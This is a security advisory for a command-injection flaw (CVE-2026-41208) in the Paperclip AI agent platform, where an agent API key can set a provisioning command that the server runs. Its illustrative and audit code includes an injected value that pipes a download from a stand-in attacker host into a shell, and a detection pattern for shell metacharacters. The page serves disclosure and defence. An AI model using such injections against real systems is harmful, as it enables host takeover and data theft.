High (8.8)

Paperclip server host command injection (CVE-2026-41208)


Attackers holding only a low-privilege Agent API key can execute arbitrary OS commands on the host running the Paperclip server (CVE-2026-41208). Update to version 2026.416.0 or later immediately.

Affected: Paperclip (npm package @paperclipai/server)

Vendor-confirmed: CVE-2026-41208 is a high-severity remote code execution vulnerability in the Paperclip AI agent platform (versions prior to 2026.416.0) that grants attackers holding only a low-privilege Agent API key full host-level command execution.

Overview

A vulnerability rated High (8.8) in the Paperclip AI agent platform lets an attacker who holds an agent-level credential escalate to arbitrary operating system command execution on the underlying server. The flaw, tracked as CVE-2026-41208, affects versions of the @paperclipai/server package prior to 2026.416.0. An attacker needs only a low-privilege Agent API key to achieve full remote code execution on the host.

Vulnerability Details

Paperclip is a Node.js and React-based platform that uses AI agents to automate business operations. The vulnerability exists because agents are permitted to modify their own configuration through the /agents/:id API endpoint, and that update path accepts the adapterConfig.workspaceStrategy.provisionCommand field from an agent principal without restriction or sanitization. The Paperclip server later executes the contents of this field when it provisions the agent's workspace, so whoever controls the field controls a command that the server runs.

This breaks the intended security boundary: an agent, which is supposed to operate within a constrained runtime, can instead inject and execute shell commands with the privileges of the main Paperclip server process. The attacker may be a compromised agent or a malicious actor who has obtained an agent credential; in either case an Agent API key, not an administrator credential, is all that is required.
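To make the bug class concrete, the following Node.js model is an added illustration and is not Paperclip's code: only the field path adapterConfig.workspaceStrategy.provisionCommand and the /agents/:id update semantics come from the advisory, while the record shape, the principal model, the sample data and the hardened variant are assumptions. It contrasts an update handler that lets an agent principal write every field of its own record and a provisioner that hands the stored string to a shell, with a hardened pair that confines agent writes to cosmetic fields and executes a validated argv without a shell.

```javascript
'use strict';

// Constructed sample: one agent record shaped like the fields the advisory names.
// The real @paperclipai/server schema is not shown on this page; only the
// field path adapterConfig.workspaceStrategy.provisionCommand comes from it.
function makeStore() {
  return new Map([[
    'agent-1',
    {
      id: 'agent-1',
      displayName: 'ops-bot',
      adapterConfig: {
        workspaceStrategy: {
          provisionCommand: 'git clone https://git.example.invalid/ops.git',
        },
      },
    },
  ]]);
}

// Recursively merge a JSON PATCH body into a stored record (plain objects only).
function deepMerge(target, patch) {
  for (const [key, value] of Object.entries(patch)) {
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      deepMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// ---- Vulnerable shape (illustrative) -------------------------------------
// PATCH /agents/:id: the only check is "an agent may edit its own record";
// every field, provisionCommand included, is writable by the agent principal.
function updateAgentVulnerable(store, principal, id, patch) {
  if (principal.type === 'agent' && principal.id !== id) throw new Error('forbidden');
  const agent = store.get(id);
  if (!agent) throw new Error('not found');
  return deepMerge(agent, patch);
}

// Provisioning hands the stored string to a shell, so ';', '|' and '$( )'
// become extra commands run under the server's own account.
// runShell defaults to a real shell; pass a recorder to inspect the string instead.
function provisionVulnerable(agent, runShell) {
  const cmd = agent.adapterConfig.workspaceStrategy.provisionCommand;
  const run = runShell || ((c) => require('node:child_process').execFileSync('/bin/sh', ['-c', c]));
  return run(cmd);
}

// ---- Hardened shape (illustrative; the vendor's actual fix is not on this page) ---
// 1. An agent principal may only write a short allowlist of cosmetic fields;
//    adapterConfig is operator-only, so the execution path is no longer agent-controlled.
const AGENT_WRITABLE_FIELDS = new Set(['displayName', 'description']);

function updateAgentHardened(store, principal, id, patch) {
  if (principal.type === 'agent') {
    if (principal.id !== id) throw new Error('forbidden');
    for (const key of Object.keys(patch)) {
      if (!AGENT_WRITABLE_FIELDS.has(key)) throw new Error(`agent may not modify ${key}`);
    }
  } else if (principal.type !== 'admin') {
    throw new Error('forbidden');
  }
  const agent = store.get(id);
  if (!agent) throw new Error('not found');
  return deepMerge(agent, patch);
}

// 2. Defence in depth: even operator-set values run as a fixed argv with no
//    shell, and only one strictly validated form is accepted.
function buildProvisionArgv(agent) {
  const cmd = agent.adapterConfig.workspaceStrategy.provisionCommand;
  const m = /^git clone (\S+)$/.exec(cmd);
  if (!m) throw new Error('provisionCommand must be exactly "git clone <https-url>"');
  const url = new URL(m[1]); // throws on anything that is not a URL
  if (url.protocol !== 'https:') throw new Error('only https:// repositories are allowed');
  return ['git', 'clone', url.href];
}

function provisionHardened(agent, runArgv) {
  const argv = buildProvisionArgv(agent);
  const run = runArgv || ((a) => require('node:child_process').execFileSync(a[0], a.slice(1)));
  return run(argv);
}

// Walk-through with recorders in place of real execution (no commands are run).
const INJECTED = 'git clone https://git.example.invalid/ops.git; curl -s https://attacker.invalid/p | sh';
function demo() {
  const agentKey = { type: 'agent', id: 'agent-1' };
  const patch = { adapterConfig: { workspaceStrategy: { provisionCommand: INJECTED } } };

  const tampered = updateAgentVulnerable(makeStore(), agentKey, 'agent-1', patch);
  const ranByVulnerableServer = provisionVulnerable(tampered, (c) => c);

  let hardenedRejected = false;
  try { updateAgentHardened(makeStore(), agentKey, 'agent-1', patch); } catch (e) { hardenedRejected = true; }
  const argvByHardenedServer = provisionHardened(makeStore().get('agent-1'), (a) => a);

  return { ranByVulnerableServer, hardenedRejected, argvByHardenedServer };
}
```

The two hardening layers are independent: the authorization check on the write path stops an Agent API key from reaching the field at all, and the no-shell argv on the execution path means that even an operator typo or a compromised admin session cannot turn the value into a second command. The advisory only says that 2026.416.0 closes the hole; which of these layers the vendor chose is not stated on this page.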

Impact

The primary impact is full remote code execution (RCE) on the host machine running the Paperclip server. A successful attacker could install malware, exfiltrate sensitive data, establish persistence, or move laterally within the network. Given that Paperclip orchestrates business operations, the server likely has access to internal APIs, databases, and other critical systems, amplifying the potential damage of a breach.

Affected Versions and Remediation

All versions of the @paperclipai/server npm package earlier than 2026.416.0 are vulnerable.

Immediate Action Required: Administrators must update their Paperclip server installation to version 2026.416.0 or later. Typically this means raising the version constraint for @paperclipai/server in package.json so that it admits 2026.416.0 or newer, running your standard install or update command (e.g., npm update), and confirming the result with npm ls @paperclipai/server, since npm update will not move past a range that still pins an older release.

If an immediate update is not possible, restrict network access to the Paperclip server's API endpoints as a temporary measure, and review stored adapterConfig.workspaceStrategy.provisionCommand values for content that no operator configured, since a modified value is the trace this attack leaves behind. Rotating Agent API keys that may have been exposed limits who can reach the endpoint in the meantime. Patching is the only complete solution.
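A small audit script for the two checks above, added here as an example rather than anything shipped by the project: it decides whether an installed @paperclipai/server version predates 2026.416.0 using numeric field-by-field comparison (a string sort would misorder calendar-style versions), and it flags stored provisionCommand values that contain shell metacharacters for human review. The node_modules path it reads is the standard npm layout and is an assumption about your deployment; the agent records are constructed sample data.

```javascript
'use strict';

const FIXED_VERSION = '2026.416.0';

// Split "2026.415.2-beta.1" into numeric parts plus an optional pre-release tag.
function parseVersion(v) {
  const m = /^v?(\d+(?:\.\d+)*)(?:-([0-9A-Za-z.-]+))?/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return { parts: m[1].split('.').map(Number), pre: m[2] || null };
}

// Numeric comparison, so 2026.416.0 > 2026.99.0 (a plain string sort gets this wrong).
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  const n = Math.max(pa.parts.length, pb.parts.length);
  for (let i = 0; i < n; i++) {
    const d = (pa.parts[i] || 0) - (pb.parts[i] || 0);
    if (d !== 0) return Math.sign(d);
  }
  // Same numbers: a pre-release sorts before the final release (semver rule),
  // so 2026.416.0-rc.1 is still treated as unpatched.
  if (pa.pre && !pb.pre) return -1;
  if (!pa.pre && pb.pre) return 1;
  return 0;
}

function isVulnerableVersion(installed) {
  return compareVersions(installed, FIXED_VERSION) < 0;
}

// Read the installed version from the package's own package.json under
// node_modules (standard npm layout; assumed to match your deployment).
function installedServerVersion(projectDir = process.cwd()) {
  const fs = require('node:fs');
  const path = require('node:path');
  const p = path.join(projectDir, 'node_modules', '@paperclipai', 'server', 'package.json');
  return JSON.parse(fs.readFileSync(p, 'utf8')).version;
}

// Flag provisionCommand values that only make sense to a shell.
// Legitimate commands may chain or pipe, so a hit means "review", not "block".
const SHELL_METACHARS = /[;&|`<>]|\$\(|\$\{|\n/;

function auditProvisionCommands(agents) {
  const findings = [];
  for (const agent of agents) {
    const cmd = agent.adapterConfig?.workspaceStrategy?.provisionCommand;
    if (typeof cmd !== 'string') continue;
    if (SHELL_METACHARS.test(cmd)) findings.push({ agentId: agent.id, provisionCommand: cmd });
  }
  return findings;
}

// Constructed sample records: one clean, one tampered, one without a workspace strategy.
const SAMPLE_AGENTS = [
  { id: 'agent-1', adapterConfig: { workspaceStrategy: { provisionCommand: 'git clone https://git.example.invalid/ops.git' } } },
  { id: 'agent-2', adapterConfig: { workspaceStrategy: { provisionCommand: 'git clone https://git.example.invalid/ops.git; curl -s https://attacker.invalid/p | sh' } } },
  { id: 'agent-3', adapterConfig: {} },
];

// Combine both checks into one report. `version` is injected so the sample
// runs without a real install; call installedServerVersion() for the live value.
function auditReport(version, agents = SAMPLE_AGENTS) {
  return {
    version,
    needsUpgrade: isVulnerableVersion(version),
    suspiciousAgents: auditProvisionCommands(agents).map((f) => f.agentId),
  };
}
```

Run auditReport(installedServerVersion()) against the exported agent records of a live deployment; a needsUpgrade of true means the patch step above is still outstanding, and any suspiciousAgents entry is a record whose provisionCommand deserves a look before the server next provisions that agent's workspace.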

Security Insight

This vulnerability highlights the inherent risk in platforms that dynamically execute user or agent-supplied configuration. It mirrors past incidents in CI/CD and DevOps tools where a “configuration-as-code” feature became a vector for command injection. As AI agent platforms grow in complexity, ensuring strict isolation between agent runtime instructions and host-level execution will be a critical, recurring security challenge. For more on how software vulnerabilities can lead to major incidents, see our breach reports.
